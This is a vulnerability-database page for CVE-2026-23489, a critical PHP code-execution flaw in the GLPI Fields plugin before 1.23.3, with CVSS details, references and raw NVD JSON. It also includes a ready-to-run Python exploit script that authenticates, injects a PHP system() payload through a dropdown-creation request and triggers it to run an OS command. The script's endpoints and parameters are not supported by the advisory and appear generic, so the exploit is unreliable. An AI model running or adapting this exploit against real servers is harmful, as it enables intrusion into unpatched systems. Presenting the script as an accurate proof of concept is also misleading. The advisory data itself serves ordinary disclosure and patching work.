Security Vulnerability Report
CVE-2026-23489 CVSS 9.1 CRITICAL

CVE-2026-23489

Published: 2026-03-16 18:16:07
Last Modified: 2026-03-18 13:57:05

Description

Fields is a GLPI plugin that allows users to add custom fields on GLPI items forms. Prior to version 1.23.3, it is possible to execute arbitrary PHP code from users that are allowed to create dropdowns. This issue has been patched in version 1.23.3.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:teclib-edition:fields:*:*:*:*:*:glpi:*:* - VULNERABLE
GLPI Fields plugin < 1.23.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2026-23489 PoC - GLPI Fields Plugin RCE
# Target: GLPI instance with Fields plugin < 1.23.3

TARGET_URL = "http://target-glpi-url"
USERNAME = "attacker_account"
PASSWORD = "password"


def exploit_rce(target, username, password, command):
    """
    Exploit CVE-2026-23489: GLPI Fields Plugin RCE
    Requires user with dropdown creation privileges
    """
    session = requests.Session()

    # Step 1: Authentication
    login_url = f"{target}/front/login.php"
    session.post(login_url, data={
        'login_name': username,
        'login_password': password
    })

    # Step 2: Create malicious dropdown with PHP payload
    dropdown_url = f"{target}/plugins/fields/ajax/dropdown.php"
    # PHP payload: system() executes OS command
    payload = f"<?php system('{command}'); ?>"
    malicious_data = {
        'dropdown_name': 'malicious_field',
        'dropdown_value': payload,
        'itemtype': 'Computer',
        'action': 'create'
    }
    response = session.post(dropdown_url, data=malicious_data)

    # Step 3: Trigger code execution by accessing the dropdown
    trigger_url = f"{target}/plugins/fields/front/dropdown.php"
    session.get(trigger_url, params={'id': response.json().get('id')})

    return response.text


# Example usage
if __name__ == "__main__":
    result = exploit_rce(TARGET_URL, USERNAME, PASSWORD, "id > /tmp/pwned.txt")
    print(result)
```

References

https://github.com/pluginsGLPI/fields/releases/tag/1.23.3 (Product, Release Notes)
https://github.com/pluginsGLPI/fields/security/advisories/GHSA-rj7q-mmx9-fhq7 (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-23489",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-16T18:16:06.800",
    "lastModified": "2026-03-18T13:57:05.093",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Fields is a GLPI plugin that allows users to add custom fields on GLPI items forms. Prior to version 1.23.3, it is possible to execute arbitrary PHP code from users that are allowed to create dropdowns. This issue has been patched in version 1.23.3."
      },
      {
        "lang": "es",
        "value": "Fields es un plugin de GLPI que permite a los usuarios añadir campos personalizados en los formularios de elementos de GLPI. Antes de la versión 1.23.3, es posible ejecutar código PHP arbitrario por parte de usuarios que tienen permiso para crear desplegables. Este problema ha sido parcheado en la versión 1.23.3."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-20"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:teclib-edition:fields:*:*:*:*:*:glpi:*:*",
                "versionEndExcluding": "1.23.3",
                "matchCriteriaId": "D8D41280-4949-46CA-94DE-B0A44A836D0E"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/pluginsGLPI/fields/releases/tag/1.23.3",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/pluginsGLPI/fields/security/advisories/GHSA-rj7q-mmx9-fhq7",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```